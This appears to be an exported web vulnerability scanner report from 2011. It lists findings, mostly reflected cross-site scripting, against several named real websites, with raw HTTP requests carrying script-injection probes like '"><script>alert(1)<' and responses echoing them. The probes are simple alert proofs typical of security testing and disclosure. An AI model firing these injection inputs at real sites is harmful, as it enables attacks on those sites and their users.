| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 23:39:49 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=nums7dcc1j Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:49 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:49 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:49 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:49 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:49 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:49 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:49 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 102528 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.transport |
| Path: | / |
| GET /?7388e"><script>alert(1)< Host: www.transportationcr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:29:31 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=uu4j24vvnh Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:31 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:31 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:31 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:31 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:31 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:31 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:31 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 126907 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.traveling |
| Path: | / |
| GET /?29013"><script>alert(1)< Host: www.travelingcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 23:39:28 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=98i3ogstgg Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:28 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:28 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:28 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:28 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:28 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:28 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:28 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 111563 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.truckingc |
| Path: | / |
| GET /?2f69c"><script>alert(1)< Host: www.truckingcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 01:24:46 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=reqvomlshr Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:46 GMT Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:46 GMT Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:46 GMT Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:46 GMT Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:46 GMT Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:46 GMT Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:46 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 109198 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.tvcrossing.com |
| Path: | / |
| GET /?ee91a"><script>alert(1)< Host: www.tvcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 01:22:12 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=seap0ed91u Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:12 GMT Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:12 GMT Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:12 GMT Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:12 GMT Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:12 GMT Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:12 GMT Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:12 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 101362 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.underwrit |
| Path: | / |
| GET /?10cd2"><script>alert(1)< Host: www.underwritingcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:29:57 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=ug7iikt1hi Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:57 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:57 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:57 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:57 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:57 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:57 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:57 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 103021 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.vault.com |
| Path: | /wps/portal/usa/companies |
| GET /wps/portal/usa/9f2df'%3balert(1)/ Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Date: Fri, 21 Jan 2011 18:46:35 GMT Server: IBM_HTTP_Server IBM-Web2-Location: /wps/portal/usa/!ut/p/c5 Content-Location: /wps/portal/usa/!ut/p/c5 Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie,Accept Set-Cookie: JSESSIONID=0000M6HzN Keep-Alive: timeout=10, max=10 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Language: en Set-Cookie: NSC_xxx.wbvmu.dpn Content-Length: 71712 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script type="text/javascript" ...[SNIP]... alse , hideGigyaLink:true , useHTML:true ,showWhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa }; var conf = { APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo }; var conf2 = { APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.vault.com |
| Path: | /wps/portal/usa/companies |
| GET /wps/portal/usa/companies Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 18:46:24 GMT Server: IBM_HTTP_Server IBM-Web2-Location: /wps/portal/usa/!ut/p/c5 Content-Location: /wps/portal/usa/!ut/p/c5 Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie,Accept Set-Cookie: JSESSIONID=0000G1 Keep-Alive: timeout=10, max=70 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Language: en Set-Cookie: NSC_xxx.wbvmu.dpn Content-Length: 58296 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script type="text/javascript" ...[SNIP]... <a href="#" onclick="toggleDisplayId( ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.vault.com |
| Path: | /wps/portal/usa/companies |
| GET /wps/portal/usa/companies Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 18:46:17 GMT Server: IBM_HTTP_Server IBM-Web2-Location: /wps/portal/usa/!ut/p/c5 Content-Location: /wps/portal/usa/!ut/p/c5 Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie,Accept Set-Cookie: JSESSIONID=0000sVZxJ Keep-Alive: timeout=10, max=41 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Language: en Set-Cookie: NSC_xxx.wbvmu.dpn Content-Length: 67435 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script type="text/javascript" ...[SNIP]... <a href="#" onclick="toggleDisplayId( ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://www.velaw.com |
| Path: | /offices/offices.aspx |
| POST /offices/offices.aspx HTTP/1.1 Host: www.velaw.com Proxy-Connection: keep-alive Referer: http://www.velaw.com Cache-Control: max-age=0 Origin: http://www.velaw.com Content-Type: application/x-www-form Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ecm=user_id=0&isMemb Content-Length: 6790 __EVENTTARGET=&_ ...[SNIP]... %2BG1taFSSMCpm066tP5g%3D& ...[SNIP]... |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 18:33:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 22470 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><title> Vinson & ...[SNIP]... <input name="ctl00$ContentP ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://www.velaw.com |
| Path: | /search/search_result |
| GET /search/search_result Host: www.velaw.com Proxy-Connection: keep-alive Referer: http://www.velaw.com Cache-Control: max-age=0 Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ecm=user_id=0&isMemb |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 18:34:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 22470 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><title> Vinson & ...[SNIP]... <input name="ctl00$ContentP ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.velaw.com |
| Path: | /workarea/csslib |
| GET /workarea/csslib Host: www.velaw.com Proxy-Connection: keep-alive Referer: http://www.velaw.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ecm=user_id=0&isMemb |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 18:32:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: public, max-age=31536000 Expires: Sat, 21 Jan 2012 18:32:25 GMT Last-Modified: Fri, 21 Jan 2011 18:32:25 GMT Content-Type: text/css; charset=utf-8 Content-Length: 6917 #Ekt_AjaxContent{padding ...[SNIP]... l('/WorkArea/images /* ######################### /* ektron registered stylesheet: css file not found */ /* id: EktronModalCss41425<script>alert(1)< /* path: /* ######################### |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.velaw.com |
| Path: | /workarea/java/ektronJs |
| GET /workarea/java/ektronJs Host: www.velaw.com Proxy-Connection: keep-alive Referer: http://www.velaw.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ecm=user_id=0&isMemb |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 18:31:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: public, max-age=31536000 Expires: Sat, 21 Jan 2012 18:31:09 GMT Last-Modified: Fri, 21 Jan 2011 18:31:09 GMT Content-Type: application/javascript; charset=utf-8 Content-Length: 266 //####################### //ektron registered javascript: js file not found //id: EktronWebToolBarJS87cde<script>alert(1)< //path: //####################### |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.veterinar |
| Path: | / |
| GET /?757dc"><script>alert(1)< Host: www.veterinarycrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 01:22:53 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=c8n3ncns7h Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:53 GMT Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:53 GMT Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:53 GMT Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:53 GMT Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:53 GMT Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:53 GMT Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:53 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 96306 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.volunteer |
| Path: | / |
| GET /?f3c91"><script>alert(1)< Host: www.volunteercrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 01:24:28 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=gsjp47s81a Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:28 GMT Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:28 GMT Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:28 GMT Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:28 GMT Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:28 GMT Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:28 GMT Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:28 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 109157 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.workathom |
| Path: | / |
| GET /?21ea6"><script>alert(1)< Host: www.workathomecrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 23:43:45 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=vppakdfp3q Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:45 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:45 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:45 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:45 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:45 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:45 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:45 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 117823 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.writingcr |
| Path: | / |
| GET /?ad0d9"><script>alert(1)< Host: www.writingcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:29:05 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=slji4fnof2 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:05 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:05 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:05 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:05 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:05 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:05 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:05 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 113221 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://www.bcgsearch.com |
| Path: | /searchresults.php |
| GET /searchresults.php?key Host: www.bcgsearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:35:18 GMT Server: Apache X-Powered-By: PHP/5.1.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Set-Cookie: PHPSESSID=p8tpdlaudt Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Set-Cookie: BCGJOB_61427=61427; expires=Sat, 05-Feb-2011 19:35:18 GMT; domain=bcgsearch.com Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 37779 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>Employment Attorney, Employment Lawyer Jobs, San Francisco, California - 61 ...[SNIP]... <input type="hidden" name="clscandidateinfo ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://www.bmwusa.com |
| Path: | /jsenvconst.ashx |
| GET /jsenvconst.ashx HTTP/1.1 Host: www.bmwusa.com Proxy-Connection: keep-alive Referer: http://www.bmwusa.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.106a9f9"-alert(1)- Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CHECK=XP9y6GTRm#@U; WK9733P=XyopNB6dCmvh |
| HTTP/1.1 200 OK Cache-Control: private Content-Type: application/x-javascript Server: Microsoft-IIS/6.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Vary: Accept-Encoding Date: Fri, 21 Jan 2011 19:27:16 GMT Connection: close Set-Cookie: NSC_CNX_21529_64.29.204 Content-Length: 663 var WEBSITE_URL = "www.bmwusa.com"; var WEB_SERVICES_URL = "ws.bmwusa.com"; var WCF_SERVICES_URL = "ws.bmwusa.com"; var RESOURCE_SERVER_URL = "cache.bmwusa.com"; var MOBILE_URL = "m.bmwusa.com"; ...[SNIP]... R_HANDLING_URL_PART = "/BYO/ErrorReporting var CLIENT_USER_AGENT = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.106a9f9"-alert(1)- var CONNECTION_TYPE = "http://"; |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://www.employmen |
| Path: | / |
| GET / HTTP/1.1 Host: www.employmentauthority Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:26:22 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=1coc9qurhv Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: public Pragma: no-cache Set-Cookie: PHPSESSID=1coc9qurhv Set-Cookie: PHPSESSID=1coc9qurhv Set-Cookie: PHPSESSID=1coc9qurhv Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 86164 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Employment Services, Executive Employment, Executive Search Consultants, Executive Job Openings</title> <met ...[SNIP]... <input type="hidden" id="clscandidate ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | https://www.lawschoo |
| Path: | /lslprivateloan |
| GET /lslprivateloan Host: www.lawschoolloans.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
| HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 01:26:04 GMT Server: Apache Accept-Ranges: bytes X-Powered-By: PHP/4.3.2 Set-Cookie: PHPSESSID=12661fb1a6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache Pragma: no-cache Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 29971 <script type="text/javascript" src="https://www <script type="text/javascript" src="https://www ...[SNIP]... <script type="text/javascript"> var submitflag = false; var page_referrer = 'http://www.google.com var landing_page = 'lslprivateloan function validateregistration() { var frm = document.formmain; errmsg = ""; frm.clsregistration ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://www.legalauthority |
| Path: | / |
| GET / HTTP/1.1 Host: www.legalauthority.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:41:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=03bo7h1rnm Expires: Sat, 26 Jul 1997 05:00:00 GMT Cache-Control: public Pragma: no-cache Set-Cookie: PHPSESSID=03bo7h1rnm Set-Cookie: LA_RUSH_ORDER=deleted; expires=Thu, 21-Jan-2010 19:41:41 GMT; path=/; domain=.legalauthority Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 130329 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>Legal Resume Consultant, Legal Job Search, Sample Attorney Resume, Legal S ...[SNIP]... <input type="hidden" name="clscandidateinfo ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://www.legalauthority |
| Path: | /signup.php |
| GET /signup.php HTTP/1.1 Host: www.legalauthority.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
